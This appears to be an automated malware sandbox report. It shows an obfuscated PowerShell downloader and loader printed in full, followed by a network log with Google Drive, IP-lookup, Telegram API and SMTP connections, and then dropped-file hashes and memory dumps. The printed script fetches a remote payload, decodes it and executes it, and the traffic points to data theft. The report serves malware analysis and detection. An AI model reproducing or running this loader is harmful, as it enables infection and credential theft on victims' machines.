ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 193.122.130.0:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.130.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 134.177.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mail.jacopopacchioni.com | udp |
| IT | 89.40.173.128:587 | mail.jacopopacchioni.com | tcp |
| US | 8.8.8.8:53 | 128.173.40.89.in-addr.arpa | udp |
| IT | 89.40.173.128:587 | mail.jacopopacchioni.com | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
memory/3032-4-0x00007FF98A933000-0x00007FF98A935000-memory.dmp
memory/3032-10-0x00000216EE460000-0x00000216EE482000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ygkeupge.013.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3032-15-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/3032-16-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/3032-19-0x00007FF98A933000-0x00007FF98A935000-memory.dmp
memory/3032-20-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/3032-21-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/3032-24-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp
memory/1620-25-0x0000000002700000-0x0000000002736000-memory.dmp
memory/1620-26-0x00000000052D0000-0x00000000058F8000-memory.dmp
memory/1620-27-0x0000000005140000-0x0000000005162000-memory.dmp
memory/1620-28-0x00000000051E0000-0x0000000005246000-memory.dmp
memory/1620-29-0x0000000005900000-0x0000000005966000-memory.dmp
memory/1620-39-0x00000000059E0000-0x0000000005D34000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2247453c28acd1eb75cfe181540458a8 |
| SHA1 | 851fc5a9950d422d76163fdc6a453d6859d56660 |
| SHA256 | 358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd |
| SHA512 | 42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3 |
memory/1620-41-0x0000000006020000-0x000000000603E000-memory.dmp
memory/1620-42-0x0000000006050000-0x000000000609C000-memory.dmp
memory/1620-43-0x0000000007820000-0x0000000007E9A000-memory.dmp
memory/1620-44-0x00000000065A0000-0x00000000065BA000-memory.dmp
memory/1620-45-0x0000000007280000-0x0000000007316000-memory.dmp
memory/1620-46-0x0000000007220000-0x0000000007242000-memory.dmp
memory/1620-47-0x0000000008450000-0x00000000089F4000-memory.dmp
C:\Users\Admin\AppData\Roaming\precompelling.Wit
| MD5 | 121104fabf2ff99a0b51a39ef26be7a0 |
| SHA1 | 2bfe2c2ecb97fc48c7d0819cbbceccdb65e0acd7 |
| SHA256 | ca1195af4e1d3e7014c66dc288f54119cae1d3e69e10c8617ab69d7b9f2fab85 |
| SHA512 | c95db7463111bd67979c92f70ac94bc5441983c32cbbf959807edb6c2f9a94ee7bc3154e179b419d486e173428589e22123d78bc949a5e2f63077f54cf4b3b8e |
memory/1620-49-0x0000000008A00000-0x000000000B256000-memory.dmp
memory/1936-62-0x0000000001040000-0x0000000002294000-memory.dmp
memory/1936-63-0x0000000001040000-0x000000000108A000-memory.dmp
memory/1936-64-0x0000000022C00000-0x0000000022C9C000-memory.dmp
memory/1936-66-0x00000000236C0000-0x0000000023882000-memory.dmp
memory/1936-67-0x0000000022FB0000-0x0000000023000000-memory.dmp
memory/1936-68-0x0000000023DC0000-0x00000000242EC000-memory.dmp
memory/1936-71-0x0000000023930000-0x00000000239C2000-memory.dmp
memory/1936-72-0x0000000020770000-0x000000002077A000-memory.dmp